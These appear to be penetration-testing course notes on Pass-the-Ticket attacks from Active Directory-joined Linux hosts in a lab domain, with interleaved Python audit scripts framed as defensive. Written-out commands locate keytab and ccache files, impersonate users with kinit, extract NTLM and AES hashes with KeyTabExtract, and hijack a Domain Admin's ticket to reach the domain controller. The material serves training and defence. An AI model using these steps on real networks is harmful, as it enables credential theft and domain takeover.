PtT From Linux
Although less common, Linux hosts can also be joined to Active Directory; when they are, authentication usually happens over Kerberos.
Summary: if we find a Linux host joined to Active Directory, we can leverage Kerberos to move laterally to other hosts (those hosts may be in a special group that allows access to the Domain Controller, and so on). The two files we are interested in are ccache and keytab files. To leverage these files to perform a PtT attack and impersonate another user, we need local elevated (root) privileges.
Table of Contents
- General Information
- Connecting to Port-forwarded Linux on Windows Machine
- Identify if a Linux machine is Domain-Joined w/ Active Directory
- Discovery! Find Kerberos Tickets in Linux
  - Linikatz to extract keytab and ccache files
  - Finding Keytab Files
  - Finding ccache Files
    (with root privileges, search for users who are logged on, find their ccache file and impersonate them)
- Exploitation! Abuse the discoveries
  - Keytab
    - Find out which user the keytab file belongs to using klist
    - Impersonate a user with keytab using kinit
    - Extracting Keytab Hashes with KeyTabExtract
      (get the hash, then either crack it or perform a PtH attack or a PtT from Windows attack)
  - ccache
Context
If we find a Linux machine joined to Active Directory, we can perform a PtT attack to impersonate other users.
ccache files
In most cases, Linux stores Kerberos tickets as ccache files in /tmp (reading or writing another user's ccache file requires elevated privileges).
KRB5CCNAME
By default, the location of the Kerberos ticket cache is stored in the environment variable KRB5CCNAME.
keytab files
Keytab files (used by Kerberos on Linux) contain pairs of Kerberos principals and encrypted keys; they allow authenticating to remote systems without entering a password, which also lets scripts authenticate automatically.
Note: Any computer with a Kerberos client installed can create keytab files. Keytab files can be created on one computer and copied for use on other computers, because they are not restricted to the systems on which they were initially created.
Connecting to Port-forwarded Linux on Windows Machine
We can only reach MS01, and only MS01 can reach the Linux machine. The Linux machine's TCP port 22 is forwarded to port 2222 on MS01.
We can connect to the Linux machine as follows:
ssh david@inlanefreight.htb@10.129.204.23 -p 2222
Identify if a Linux machine is Domain-Joined w/ Active Directory
Realm
Check with the command:
realm list
david@inlanefreight.htb@linux01:~$ realm list
inlanefreight.htb
type: kerberos
realm-name: INLANEFREIGHT.HTB
domain-name: inlanefreight.htb
configured: kerberos-member
server-software: active-directory
client-software: sssd
required-package: sssd-tools
required-package: sssd
required-package: libnss-sss
required-package: libpam-sss
required-package: adcli
required-package: samba-common-bin
login-formats: %U@inlanefreight.htb
login-policy: allow-permitted-logins
permitted-logins: david@inlanefreight.htb, julio@inlanefreight.htb
permitted-groups: Linux Admins
This reveals that:
- the machine is configured as a Kerberos member
- the domain name is inlanefreight.htb
- the users david and julio are permitted to log in
- the group Linux Admins is permitted to log in
If realm is unavailable, check for the winbind or sssd processes instead:
david@inlanefreight.htb@linux01:~$ ps -ef | grep -i "winbind\|sssd"
root 2140 1 0 Sep29 ? 00:00:01 /usr/sbin/sssd -i --logger=files
root 2141 2140 0 Sep29 ? 00:00:08 /usr/libexec/sssd/sssd_be --domain inlanefreight.htb --uid 0 --gid 0 --logger=files
root 2142 2140 0 Sep29 ? 00:00:03 /usr/libexec/sssd/sssd_nss --uid 0 --gid 0 --logger=files
root 2143 2140 0 Sep29 ? 00:00:03 /usr/libexec/sssd/sssd_pam --uid 0 --gid 0 --logger=files
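To turn the two checks above (realm list and the sssd/winbind process list) into something repeatable across many hosts, here is an added Python example. It is my own code, not part of the original notes or of the realmd/sssd projects; the sample inputs are constructed from the output shown above, and the function names (parse_realm_list, domain_join_summary, ad_client_processes) are mine.

```python
# Constructed sample: the `realm list` output shown above, with a couple of
# repeated `required-package` lines to show how list-valued fields are handled.
REALM_LIST_SAMPLE = """\
inlanefreight.htb
  type: kerberos
  realm-name: INLANEFREIGHT.HTB
  domain-name: inlanefreight.htb
  configured: kerberos-member
  server-software: active-directory
  client-software: sssd
  required-package: sssd-tools
  required-package: sssd
  login-formats: %U@inlanefreight.htb
  login-policy: allow-permitted-logins
  permitted-logins: david@inlanefreight.htb, julio@inlanefreight.htb
  permitted-groups: Linux Admins
"""

# Constructed sample of `ps -ef` output: two sssd lines plus unrelated noise.
PS_SAMPLE = """\
root         1     0  0 Sep29 ?        00:00:02 /sbin/init
root      2140     1  0 Sep29 ?        00:00:01 /usr/sbin/sssd -i --logger=files
root      2141  2140  0 Sep29 ?        00:00:08 /usr/libexec/sssd/sssd_be --domain inlanefreight.htb --uid 0 --gid 0 --logger=files
david     3301  3300  0 10:12 pts/0    00:00:00 -bash
"""

LIST_FIELDS = ("permitted-logins", "permitted-groups", "required-package")


def parse_realm_list(text):
    """Parse `realm list` output into {realm: {field: value}}.

    Unindented lines name a realm; indented `key: value` lines belong to the
    most recent realm. Fields in LIST_FIELDS are accumulated as lists.
    """
    realms, current = {}, None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if not raw[0].isspace():                 # new realm block
            current = raw.strip()
            realms[current] = {}
            continue
        if current is None or ":" not in raw:
            continue
        key, _, value = raw.strip().partition(":")
        key, value = key.strip(), value.strip()
        if key in LIST_FIELDS:
            realms[current].setdefault(key, []).extend(
                v.strip() for v in value.split(",") if v.strip())
        else:
            realms[current][key] = value
    return realms


def domain_join_summary(text):
    """One finding per realm: is the host joined, to which realm, via which client."""
    findings = []
    for name, fields in parse_realm_list(text).items():
        findings.append({
            "realm": name,
            "joined": fields.get("configured") == "kerberos-member",
            "kerberos_realm": fields.get("realm-name"),
            "client": fields.get("client-software"),
            "permitted_logins": fields.get("permitted-logins", []),
            "permitted_groups": fields.get("permitted-groups", []),
        })
    return findings


AD_CLIENT_DAEMONS = ("sssd", "winbindd")   # sssd spawns sssd_be, sssd_nss, sssd_pam ...


def ad_client_processes(ps_text):
    """Return the set of AD client daemons present in `ps -ef` style output."""
    found = set()
    for line in ps_text.splitlines():
        parts = line.split(None, 7)              # UID PID PPID C STIME TTY TIME CMD
        if len(parts) < 8:
            continue
        binary = parts[7].split()[0].rsplit("/", 1)[-1]   # basename of the command
        for daemon in AD_CLIENT_DAEMONS:
            if binary == daemon or binary.startswith(daemon + "_"):
                found.add(daemon)
    return found


if __name__ == "__main__":
    for finding in domain_join_summary(REALM_LIST_SAMPLE):
        print(finding)
    print("AD client daemons running:", ad_client_processes(PS_SAMPLE))
```

Feeding it the real output (`realm list` and `ps -ef`) instead of the constructed samples gives an inventory of which hosts are domain members and who is allowed to log in, which is exactly the list of accounts whose ccache and keytab files may end up on that host.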
Finding Kerberos Tickets in Linux
Linikatz to extract keytab and ccache files
wget https://raw.githubusercontent.com/CiscoCXSecurity/linikatz/master/linikatz.sh
/opt/linikatz.sh
Linikatz is a Linux tool similar to Mimikatz, created by Cisco to extract credentials from Linux machines integrated with Active Directory.
- Requires root access to run.
- Extracts credentials, including Kerberos tickets, from systems like FreeIPA, SSSD, Samba, etc.
- Saves credentials in a folder whose name begins with linikatz, in formats like ccache and keytab, ready for use.
Finding Keytab Files
Search by keyword (the glob is quoted so the shell does not expand it in the current directory):
find / -name '*keytab*' -ls 2>/dev/null
david@inlanefreight.htb@linux01:~$ find / -name *keytab* -ls 2>/dev/null
<SNIP>
131610 4 -rw------- 1 root root 1348 Oct 4 16:26 /etc/krb5.keytab
262169 4 -rw-rw-rw- 1 root root 216 Oct 12 15:13 /opt/specialfiles/carlos.keytab
In cron jobs
Keytab files do not necessarily have the extension .keytab, so we may also find them referenced in cron job scripts.
carlos@inlanefreight.htb@linux01:~$ crontab -l
# Edit this file to introduce tasks to be run by cron.
#
<SNIP>
#
# m h dom mon dow command
*5/ * * * * /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
carlos@inlanefreight.htb@linux01:~$ cat /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
#!/bin/bash
kinit svc_workstations@INLANEFREIGHT.HTB -k -t /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
smbclient //dc01.inlanefreight.htb/svc_workstations -c 'ls' -k -no-pass > /home/carlos@inlanefreight.htb/script-test-results.txt
The script above uses kinit, which indicates that Kerberos is in use. kinit allows interaction with Kerberos: it requests the user's TGT and stores it in the ccache.
The script imports the Kerberos keytab svc_workstations.kt for the user svc_workstations@INLANEFREIGHT.HTB.
Note: As seen in the Pass the Ticket (Windows) section, a computer account needs a ticket to interact with the AD environment. Similarly, a domain-joined Linux machine needs a ticket, which it obtains from the keytab file located by default at /etc/krb5.keytab; that file can only be read by the root user. If we gain access to this keytab, we can impersonate the computer account LINUX01$.INLANEFREIGHT.HTB.
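The two discovery methods above (the `find` name search and reading cron scripts for keytabs with non-standard names) can be combined into a single audit that also flags keytabs readable by users other than root, as carlos.keytab (mode -rw-rw-rw-) is above. The following Python is an added example of mine, not code from the original notes or from any tool mentioned here; the sample `find -ls` lines and the cron script are constructed from the listings above, and the function names (parse_find_ls, keytab_findings, keytabs_from_script, audit_keytabs) are assumptions.

```python
import re

# Constructed sample: the `find / -name '*keytab*' -ls` lines shown above.
FIND_LS_SAMPLE = """\
131610 4 -rw------- 1 root root 1348 Oct 4 16:26 /etc/krb5.keytab
262169 4 -rw-rw-rw- 1 root root 216 Oct 12 15:13 /opt/specialfiles/carlos.keytab
"""

# Constructed sample of a cron script that loads a keytab whose name lacks ".keytab".
CRON_SCRIPT_SAMPLE = """\
#!/bin/bash
kinit svc_workstations@INLANEFREIGHT.HTB -k -t /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
smbclient //dc01.inlanefreight.htb/svc_workstations -c 'ls' -k --no-pass > /tmp/results.txt
"""


def parse_find_ls(text):
    """Parse `find -ls` lines: inode blocks mode nlink owner group size mon day time path."""
    entries = []
    for line in text.splitlines():
        parts = line.split(None, 10)          # path is the 11th field and may contain spaces
        if len(parts) < 11:
            continue
        entries.append({"mode": parts[2], "owner": parts[4], "group": parts[5],
                        "size": int(parts[6]), "path": parts[10]})
    return entries


def keytab_findings(entry):
    """Permission problems for one keytab; an empty list means root-only access."""
    mode = entry["mode"]      # '-rw-rw-rw-' = [type][owner rwx][group rwx][other rwx]
    problems = []
    if entry["owner"] != "root":
        problems.append("not owned by root")
    if mode[4] == "r":
        problems.append("group-readable")
    if mode[7] == "r":
        problems.append("world-readable")
    if mode[8] == "w":
        problems.append("world-writable")
    return problems


KINIT_RE = re.compile(r"\bkinit\b(?P<args>[^\n]*)")
# MIT kinit options that take a value; everything else starting with '-' is a bare flag.
KINIT_OPTS_WITH_ARG = {"-c", "-l", "-r", "-s", "-S", "-T", "-I", "-X", "-t"}


def keytabs_from_script(script):
    """Return (principal, keytab_path) for every `kinit ... -t <path>` call in a script."""
    refs = []
    for m in KINIT_RE.finditer(script):
        tokens = m.group("args").split()
        keytab = principal = None
        i = 0
        while i < len(tokens):
            tok = tokens[i]
            if tok in KINIT_OPTS_WITH_ARG and i + 1 < len(tokens):
                if tok == "-t":
                    keytab = tokens[i + 1]
                i += 2
            elif tok.startswith("-"):           # bare flag such as -k
                i += 1
            else:
                principal = principal or tok    # first bare word is the principal
                i += 1
        if keytab:
            refs.append((principal, keytab))
    return refs


def audit_keytabs(find_ls_text, scripts):
    """Merge both sources: path -> {'findings': [...], 'used_by': [principals]}."""
    report = {}
    for entry in parse_find_ls(find_ls_text):
        report[entry["path"]] = {"findings": keytab_findings(entry), "used_by": []}
    for principal, path in (ref for s in scripts for ref in keytabs_from_script(s)):
        # A keytab only known from a script was missed by the name search: worth a look.
        report.setdefault(path, {"findings": ["not found by name search"], "used_by": []})
        report[path]["used_by"].append(principal)
    return report


if __name__ == "__main__":
    for path, info in audit_keytabs(FIND_LS_SAMPLE, [CRON_SCRIPT_SAMPLE]).items():
        print(path, info)
```

In practice the scripts argument would be the contents of every user's crontab entries and the scripts they call; the report then lists each keytab, who it authenticates as, and whether anyone other than root can read it.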
Finding ccache files
Look at the environment variable that points to the ccache file:
env | grep -i krb5
david@inlanefreight.htb@linux01:~$ env | grep -i krb5
KRB5CCNAME=FILE:/tmp/krb5cc_647402606_qd2Pfh
Search for ccache files:
ls -la /tmp
david@inlanefreight.htb@linux01:~$ ls -la /tmp
total 68
drwxrwxrwt 13 root root 4096 Oct 6 16:38 .
drwxr-xr-x 20 root root 4096 Oct 6 2021 ..
-rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 6 16:38 krb5cc_647401106_tBswau
-rw------- 1 david@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 6 15:23 krb5cc_647401107_Gf415d
-rw------- 1 carlos@inlanefreight.htb domain users@inlanefreight.htb 1433 Oct 6 15:43 krb5cc_647402606_qd2Pfh
Exploiting Keytab Files
With a keytab file, we can impersonate a user using kinit.
Find out which user the keytab file belongs to using klist:
klist -k -t /opt/specialfiles/carlos.keytab
david@inlanefreight.htb@linux01:~$ klist -k -t /opt/specialfiles/carlos.keytab
Keytab name: FILE:/opt/specialfiles/carlos.keytab
KVNO Timestamp Principal
---- ------------------- ------------------------------------------------------
1 10/06/2022 17:09:13 carlos@INLANEFREIGHT.HTB
Impersonate a user with keytab using kinit
Note: To keep the ticket from the current session, save a copy of the ccache file referenced by the environment variable KRB5CCNAME before importing the keytab.
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab
Verify:
klist
Verify by accessing SMB:
david@inlanefreight.htb@linux01:~$ smbclient //dc01/carlos -k -c ls
. D 0 Thu Oct 6 14:46:26 2022
.. D 0 Thu Oct 6 14:46:26 2022
carlos.txt A 15 Thu Oct 6 14:46:54 2022
7706623 blocks of size 4096. 4452852 blocks available
The whole process:
david@inlanefreight.htb@linux01:~$ klist
Ticket cache: FILE:/tmp/krb5cc_647401107_r5qiuu
Default principal: david@INLANEFREIGHT.HTB
Valid starting Expires Service principal
10/06/22 17:02:11 10/07/22 03:02:11 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/07/22 17:02:11
david@inlanefreight.htb@linux01:~$ kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab
david@inlanefreight.htb@linux01:~$ klist
Ticket cache: FILE:/tmp/krb5cc_647401107_r5qiuu
Default principal: carlos@INLANEFREIGHT.HTB
Valid starting Expires Service principal
10/06/22 17:16:11 10/07/22 03:16:11 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/07/22 17:16:11
Extracting Keytab Hashes with KeyTabExtract
python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
david@inlanefreight.htb@linux01:~$ python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : INLANEFREIGHT.HTB
SERVICE PRINCIPAL : carlos/
NTLM HASH : a738f92b3c08b424ec2d99589a9cce60
AES-256 HASH : 42ff0baa586963d9010584eb9590595e8cd47c489e25e82aae69b1de2943007f
AES-128 HASH : fa74d5abf4061baa1d4ff8485d1261c4
With the NTLM hash, we can perform a PtH attack. With the AES256 or AES128 hash, we can forge tickets using Rubeus or attempt to crack the hashes to obtain the plaintext password.
Crack the hash with Hashcat (as seen in Attacking SAM and Attacking LSASS) or John the Ripper; it can also be done at
https://crackstation.net
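The klist -k output and the KeyTabExtract run above both come down to reading the MIT keytab file format: each entry holds a principal, a key version number, an encryption type and the key itself, and the RC4-HMAC (etype 23) key is the account's NT hash, which is why KeyTabExtract reports it as "NTLM HASH". The following Python is an added example of mine (not code from the original notes, from MIT Kerberos or from KeyTabExtract) that builds a keytab and lists its principals and encryption types the way klist -k -e would, deliberately skipping the key bytes, so it can be used to inventory keytabs and flag the ones that still carry RC4 keys. The principal and key bytes in the sample are placeholders, and the function names (build_keytab, parse_keytab, keytab_risk_report) are mine.

```python
import struct

# Encryption type numbers as used in keytab entries (MIT/RFC assignments).
ENCTYPE_NAMES = {
    1: "des-cbc-crc", 3: "des-cbc-md5", 16: "des3-cbc-sha1",
    17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96",
    19: "aes128-cts-hmac-sha256-128", 20: "aes256-cts-hmac-sha384-192",
    23: "arcfour-hmac",
}
RC4_HMAC = 23   # an RC4 key in a keytab is the raw NT hash of the account password


def _counted(data: bytes) -> bytes:
    """counted_octet_string: 16-bit big-endian length followed by the bytes."""
    return struct.pack(">H", len(data)) + data


def build_keytab(entries):
    """Serialise (principal, kvno, enctype, key, timestamp) tuples as a version-2 keytab."""
    out = bytearray(b"\x05\x02")                          # file version 0x0502
    for principal, kvno, enctype, key, ts in entries:
        name, _, realm = principal.rpartition("@")
        comps = name.split("/")                           # e.g. host/linux01.example
        body = struct.pack(">H", len(comps)) + _counted(realm.encode())
        for comp in comps:
            body += _counted(comp.encode())
        body += struct.pack(">IIB", 1, ts, kvno & 0xFF)   # name_type NT-PRINCIPAL, timestamp, vno8
        body += struct.pack(">H", enctype) + _counted(key)
        body += struct.pack(">I", kvno)                   # optional 32-bit vno trailer
        out += struct.pack(">i", len(body)) + body        # entry is prefixed by its size
    return bytes(out)


def _take_string(blob, pos):
    (n,) = struct.unpack_from(">H", blob, pos)
    return blob[pos + 2:pos + 2 + n].decode(), pos + 2 + n


def parse_keytab(blob):
    """Return principal/kvno/enctype per entry; the key material is skipped, never returned."""
    if blob[:2] not in (b"\x05\x01", b"\x05\x02"):
        raise ValueError("not an MIT keytab")
    version, pos, entries = blob[1], 2, []
    while pos + 4 <= len(blob):
        (size,) = struct.unpack_from(">i", blob, pos)
        pos += 4
        if size <= 0:                                     # negative size: deleted slot
            pos += -size
            continue
        end = pos + size
        (ncomp,) = struct.unpack_from(">H", blob, pos)
        pos += 2
        if version == 1:                                  # v1 counts the realm as a component
            ncomp -= 1
        realm, pos = _take_string(blob, pos)
        comps = []
        for _ in range(ncomp):
            comp, pos = _take_string(blob, pos)
            comps.append(comp)
        if version == 2:
            pos += 4                                      # name_type (absent in v1)
        ts, vno8 = struct.unpack_from(">IB", blob, pos)
        pos += 5
        enctype, klen = struct.unpack_from(">HH", blob, pos)
        pos += 4 + klen                                   # skip over the key bytes
        vno = vno8
        if end - pos >= 4:                                # 32-bit vno present
            (vno,) = struct.unpack_from(">I", blob, pos)
        pos = end
        entries.append({"principal": "/".join(comps) + "@" + realm, "kvno": vno,
                        "enctype": enctype,
                        "enctype_name": ENCTYPE_NAMES.get(enctype, f"etype-{enctype}"),
                        "timestamp": ts})
    return entries


def keytab_risk_report(blob):
    """Which principals the keytab can authenticate as, and which of them carry RC4 keys."""
    entries = parse_keytab(blob)
    return {
        "entries": len(entries),
        "principals": sorted({e["principal"] for e in entries}),
        "rc4_principals": sorted({e["principal"] for e in entries if e["enctype"] == RC4_HMAC}),
    }


# Constructed sample mirroring the carlos.keytab listing above; keys and timestamp are placeholders.
SAMPLE_KEYTAB = build_keytab([
    ("carlos@INLANEFREIGHT.HTB", 1, 23, b"\x11" * 16, 1665076153),
    ("carlos@INLANEFREIGHT.HTB", 1, 18, b"\x22" * 32, 1665076153),
    ("carlos@INLANEFREIGHT.HTB", 1, 17, b"\x33" * 16, 1665076153),
])

if __name__ == "__main__":
    for e in parse_keytab(SAMPLE_KEYTAB):
        print(f"{e['kvno']:>4} {e['enctype_name']:<28} {e['principal']}")
    print(keytab_risk_report(SAMPLE_KEYTAB))
```

Running keytab_risk_report over a real file (open(path, "rb").read()) tells a defender which accounts a stray keytab grants and whether an RC4 entry is present; removing RC4 from the account's supported encryption types makes that NT-hash extraction impossible for newly issued keytabs.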
Log in after cracking the password:
david@inlanefreight.htb@linux01:~$ su - carlos@inlanefreight.htb
Password:
carlos@inlanefreight.htb@linux01:~$ klist
Ticket cache: FILE:/tmp/krb5cc_647402606_ZX6KFA
Default principal: carlos@INLANEFREIGHT.HTB
Valid starting Expires Service principal
10/07/2022 11:01:13 10/07/2022 21:01:13 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/08/2022 11:01:13
Exploiting ccache files
We need root privileges to read another user's ccache file.
1. Connect to the port-forwarded Linux machine from the Windows machine.
2. Confirm we have root privileges: sudo -l
3. Log in as root: sudo su
4. Find ccache files:
root@linux01:~# ls -la /tmp
total 76
drwxrwxrwt 13 root root 4096 Oct 7 11:35 .
drwxr-xr-x 20 root root 4096 Oct 6 2021 ..
-rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 7 11:35 krb5cc_647401106_HRJDux
-rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 7 11:35 krb5cc_647401106_qMKxc6
-rw------- 1 david@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 7 10:43 krb5cc_647401107_O0oUWh
-rw------- 1 svc_workstations@inlanefreight.htb domain users@inlanefreight.htb 1535 Oct 7 11:21 krb5cc_647401109_D7gVZF
-rw------- 1 carlos@inlanefreight.htb domain users@inlanefreight.htb 3175 Oct 7 11:35 krb5cc_647402606
-rw------- 1 carlos@inlanefreight.htb domain users@inlanefreight.htb 1433 Oct 7 11:01 krb5cc_647402606_ZX6KFA
Say we want the user julio, whom we do not have access to. Let's use his ccache file to impersonate him.
5. Identify which groups julio belongs to:
root@linux01:~# id julio@inlanefreight.htb
uid=647401106(julio@inlanefreight.htb) gid=647400513(domain users@inlanefreight.htb) groups=647400513(domain users@inlanefreight.htb),647400512(domain admins@inlanefreight.htb),647400572(denied rodc password replication group@inlanefreight.htb)
julio is a member of the Domain Admins group. We can attempt to impersonate julio and gain access to the DC01 Domain Controller host.
6. Impersonate julio
Copy the ccache file to the current directory:
cp /tmp/krb5cc_647401106_I8I133 .
Make the environment variable point to julio's ccache:
export KRB5CCNAME=/root/krb5cc_647401106_I8I133
Verify:
klist
Pay attention to whether the ticket has expired; once expired it can no longer be used.
root@linux01:~# klist
klist: No credentials cache found (filename: /tmp/krb5cc_0)
root@linux01:~# cp /tmp/krb5cc_647401106_I8I133 .
root@linux01:~# export KRB5CCNAME=/root/krb5cc_647401106_I8I133
root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647401106_I8I133
Default principal: julio@INLANEFREIGHT.HTB
Valid starting Expires Service principal
10/07/2022 13:25:01 10/07/2022 23:25:01 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/08/2022 13:25:01
root@linux01:~# smbclient //dc01/C$ -k -c ls -no-pass
$Recycle.Bin DHS 0 Wed Oct 6 17:31:14 2021
Config.Msi DHS 0 Wed Oct 6 14:26:27 2021
Documents and Settings DHSrn 0 Wed Oct 6 20:38:04 2021
john D 0 Mon Jul 18 13:19:50 2022
julio D 0 Mon Jul 18 13:54:02 2022
pagefile.sys AHS 738197504 Thu Oct 6 21:32:44 2022
PerfLogs D 0 Fri Feb 25 16:20:48 2022
Program Files DR 0 Wed Oct 6 20:50:50 2021
Program Files (x86) D 0 Mon Jul 18 16:00:35 2022
ProgramData DHn 0 Fri Aug 19 12:18:42 2022
SharedFolder D 0 Thu Oct 6 14:46:20 2022
System Volume Information DHS 0 Wed Jul 13 19:01:52 2022
tools D 0 Thu Sep 22 18:19:04 2022
Users DR 0 Thu Oct 6 11:46:05 2022
Windows D 0 Wed Oct 5 13:20:00 2022
7706623 blocks of size 4096. 4447612 blocks available
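The three checks in this section, which ccache files sit in /tmp and who owns them, whether that owner is in a privileged group such as Domain Admins (the id output in step 5), and whether the cached TGT is still valid (the "pay attention if the ticket expired" note), are what a defender would want to run on every domain-joined Linux host to find cached Domain Admin tickets before someone else does. The following Python is an added example of mine, not code from the original notes or from MIT Kerberos; the /tmp listing, id output and klist output are constructed from the sessions above, and the function names (parse_ccache_listing, is_privileged, exposed_caches, parse_klist, tgt_status) are assumptions.

```python
import re
from datetime import datetime

# Constructed samples, taken from the listings shown above.
TMP_LISTING = """\
total 76
drwxrwxrwt 13 root root 4096 Oct 7 11:35 .
drwxr-xr-x 20 root root 4096 Oct 6 2021 ..
-rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 7 11:35 krb5cc_647401106_HRJDux
-rw------- 1 david@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 7 10:43 krb5cc_647401107_O0oUWh
-rw------- 1 carlos@inlanefreight.htb domain users@inlanefreight.htb 1433 Oct 7 11:01 krb5cc_647402606_ZX6KFA
"""
ID_JULIO = ("uid=647401106(julio@inlanefreight.htb) gid=647400513(domain users@inlanefreight.htb) "
            "groups=647400513(domain users@inlanefreight.htb),647400512(domain admins@inlanefreight.htb),"
            "647400572(denied rodc password replication group@inlanefreight.htb)")
KLIST_JULIO = """\
Ticket cache: FILE:/root/krb5cc_647401106_I8I133
Default principal: julio@INLANEFREIGHT.HTB

Valid starting       Expires              Service principal
10/07/2022 13:25:01  10/07/2022 23:25:01  krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
\trenew until 10/08/2022 13:25:01
"""

# Built-in AD groups whose cached tickets on a member host are a high-value exposure.
PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "administrators", "schema admins"}

# `ls -la` line. The group name can contain spaces ("domain users@..."), hence the lazy match
# that stops at the numeric size field.
LS_RE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9}[.+]?)\s+(?P<nlink>\d+)\s+(?P<owner>\S+)\s+(?P<group>.+?)\s+"
    r"(?P<size>\d+)\s+(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2})\s+(?P<tm>\d{2}:\d{2}|\d{4})\s+(?P<name>.+)$")


def parse_ccache_listing(text):
    """Return the krb5cc files from an `ls -la /tmp` listing with their owners."""
    caches = []
    for line in text.splitlines():
        m = LS_RE.match(line)
        if m and m.group("name").startswith("krb5cc"):
            caches.append({"owner": m.group("owner"), "name": m.group("name"),
                           "size": int(m.group("size"))})
    return caches


def groups_from_id(id_output):
    """Group names from `id` output, lower-cased with the realm suffix stripped."""
    m = re.search(r"groups=(.*)$", id_output)
    if not m:
        return set()
    return {n.split("@")[0].lower() for n in re.findall(r"\d+\(([^)]+)\)", m.group(1))}


def is_privileged(id_output):
    return bool(groups_from_id(id_output) & PRIVILEGED_GROUPS)


def exposed_caches(listing, id_by_user):
    """Cache files owned by privileged users; id_by_user maps owner -> that user's `id` output."""
    return [c["name"] for c in parse_ccache_listing(listing)
            if is_privileged(id_by_user.get(c["owner"], ""))]


TICKET_RE = re.compile(r"^(\d{2}/\d{2}/\d{2,4} \d{2}:\d{2}:\d{2})\s+"
                       r"(\d{2}/\d{2}/\d{2,4} \d{2}:\d{2}:\d{2})\s+(\S+)")


def _parse_ts(s):
    for fmt in ("%m/%d/%Y %H:%M:%S", "%m/%d/%y %H:%M:%S"):   # klist prints either year form
        try:
            return datetime.strptime(s, fmt)
        except ValueError:
            pass
    raise ValueError(f"unrecognised klist timestamp: {s}")


def parse_klist(text):
    """Cache path, default principal and the (start, expires, service) of each ticket."""
    info = {"cache": None, "principal": None, "tickets": []}
    for line in text.splitlines():
        if line.startswith("Ticket cache:"):
            info["cache"] = line.split(":", 1)[1].strip()
        elif line.startswith("Default principal:"):
            info["principal"] = line.split(":", 1)[1].strip()
        else:
            m = TICKET_RE.match(line.strip())
            if m:
                info["tickets"].append({"start": _parse_ts(m.group(1)),
                                        "expires": _parse_ts(m.group(2)),
                                        "service": m.group(3)})
    return info


def tgt_status(klist_text, now):
    """'valid', 'expired' or 'none' for the krbtgt ticket in a klist output at time `now`."""
    tgts = [t for t in parse_klist(klist_text)["tickets"] if t["service"].startswith("krbtgt/")]
    if not tgts:
        return "none"
    return "valid" if any(t["start"] <= now < t["expires"] for t in tgts) else "expired"


if __name__ == "__main__":
    print(exposed_caches(TMP_LISTING, {"julio@inlanefreight.htb": ID_JULIO}))
    print(parse_klist(KLIST_JULIO)["principal"], tgt_status(KLIST_JULIO, datetime(2022, 10, 7, 14, 0, 0)))
```

The id_by_user mapping would be filled by running id for each distinct owner found in the listing; the TGT expiry check is the same 10-hour window shown in the klist output above, so a Domain Admin cache file found on a member server is only live for that long unless it is renewed.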